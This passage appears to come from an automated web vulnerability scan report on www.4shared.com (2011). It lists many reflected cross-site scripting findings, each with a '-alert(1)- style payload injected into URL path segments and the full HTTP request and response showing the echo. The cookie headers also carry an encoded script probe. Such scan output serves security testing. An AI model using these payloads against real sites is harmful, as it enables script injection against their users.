User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /index.jspe191f"-alert(1)-"6e354f00eec
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77F2937069CCE87EA2E64BB3CD685400.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:37 GMT
Connection: close
Content-Length: 36108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/index.jspe191f"-alert(1)-"6e354f00eec";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.275. http://www.4shared.com/js/index.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab098"-alert(1)-"8cd6f08d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsab098"-alert(1)-"8cd6f08d9/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsab098"-alert(1)-"8cd6f08d9/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=57CB8FCED9A0A676750D873D115BEA0A.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsab098"-alert(1)-"8cd6f08d9/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.276. http://www.4shared.com/js/index.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b20d'-alert(1)-'a6a470350d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js5b20d'-alert(1)-'a6a470350d8/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js5b20d'-alert(1)-'a6a470350d8/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7C4F1BEB54EBB70E5B4F0A63B0433739.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:27 GMT
Content-Length: 36133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js5b20d'-alert(1)-'a6a470350d8/index.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.277. http://www.4shared.com/js/index.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa86"-alert(1)-"df4c1953dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/index.jsefa86"-alert(1)-"df4c1953dcc?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/index.jsefa86"-alert(1)-"df4c1953dcc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BDFBB8D835A68248C340B07013F288A2.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:33 GMT
Content-Length: 36818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/index.jsefa86"-alert(1)-"df4c1953dcc";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.278. http://www.4shared.com/js/index.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c3ca'-alert(1)-'178b09589b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/index.js8c3ca'-alert(1)-'178b09589b0?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/index.js8c3ca'-alert(1)-'178b09589b0
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5DE84887E9AEAB2E9BC46960F794373B.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:35 GMT
Content-Length: 36832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/index.js8c3ca'-alert(1)-'178b09589b0',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.279. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55f12"-alert(1)-"f7aecd99122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js55f12"-alert(1)-"f7aecd99122/loginScript.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js55f12"-alert(1)-"f7aecd99122/loginScript.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3E73AECAF5C0BAC4CA79DF79445828D0.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:31 GMT
Content-Length: 36855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js55f12"-alert(1)-"f7aecd99122/loginScript.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.280. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3d82'-alert(1)-'95c7ed91f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jse3d82'-alert(1)-'95c7ed91f26/loginScript.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jse3d82'-alert(1)-'95c7ed91f26/loginScript.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2289A6C813530BA9D86A174DC1D2A76D.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:34 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jse3d82'-alert(1)-'95c7ed91f26/loginScript.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}
...[SNIP]...

1.281. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b91f5'-alert(1)-'d0e1e53d172 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/loginScript.jspb91f5'-alert(1)-'d0e1e53d172?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/loginScript.jspb91f5'-alert(1)-'d0e1e53d172
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=34A760ED8958DA8272F571FB0F9F4FE4.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:42 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/loginScript.jspb91f5'-alert(1)-'d0e1e53d172',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.282. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de174"-alert(1)-"725a9c623ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/loginScript.jspde174"-alert(1)-"725a9c623ce?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/loginScript.jspde174"-alert(1)-"725a9c623ce
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=73266099C7D574540CC4E6F42B2C66F0.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:39 GMT
Content-Length: 36168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/loginScript.jspde174"-alert(1)-"725a9c623ce";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.283. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b6a5'-alert(1)-'f3a6263e3a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js9b6a5'-alert(1)-'f3a6263e3a1/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js9b6a5'-alert(1)-'f3a6263e3a1/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=05BB07CEB4CEB9F7EFF952E4B3A743B6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:31 GMT
Content-Length: 36864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js9b6a5'-alert(1)-'f3a6263e3a1/signup-script.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

1.284. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe0b9"-alert(1)-"c10b6d0808b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsfe0b9"-alert(1)-"c10b6d0808b/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsfe0b9"-alert(1)-"c10b6d0808b/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E24C1E87E4B669F1C8521481DBCB7839.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:29 GMT
Content-Length: 36876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsfe0b9"-alert(1)-"c10b6d0808b/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

1.285. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a18c7'-alert(1)-'693b76e087e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/signup-script.jspa18c7'-alert(1)-'693b76e087e?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jspa18c7'-alert(1)-'693b76e087e
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=88A144F9DD398CA57B2EA27D88819478.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:39 GMT
Content-Length: 36864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
Box == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/signup-script.jspa18c7'-alert(1)-'693b76e087e',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.286. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd94"-alert(1)-"07633452741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/signup-script.jsp8cd94"-alert(1)-"07633452741?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp8cd94"-alert(1)-"07633452741
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A2D2D02377B86E002D082324E7FF1D94.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:37 GMT
Content-Length: 36172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/signup-script.jsp8cd94"-alert(1)-"07633452741";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.287. http://www.4shared.com/loginBox.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/loginBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a824'-alert(1)-'b29f28ff5e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /loginBox.jsp9a824'-alert(1)-'b29f28ff5e0 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /loginBox.jsp9a824'-alert(1)-'b29f28ff5e0
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8222174CC5AEFF77849626A401D31A00.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:05 GMT
Connection: close
Content-Length: 36112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
of loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/loginBox.jsp9a824'-alert(1)-'b29f28ff5e0',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.288. http://www.4shared.com/loginBox.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/loginBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15fe3"-alert(1)-"13719462e8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /loginBox.jsp15fe3"-alert(1)-"13719462e8f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /loginBox.jsp15fe3"-alert(1)-"13719462e8f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=92FE70F5A3203E5B91958B63EB8FC1BD.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/loginBox.jsp15fe3"-alert(1)-"13719462e8f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.289. http://www.4shared.com/m/android.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/android.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9395b"-alert(1)-"96bc668bd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m9395b"-alert(1)-"96bc668bd2/android.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m9395b"-alert(1)-"96bc668bd2/android.jsp
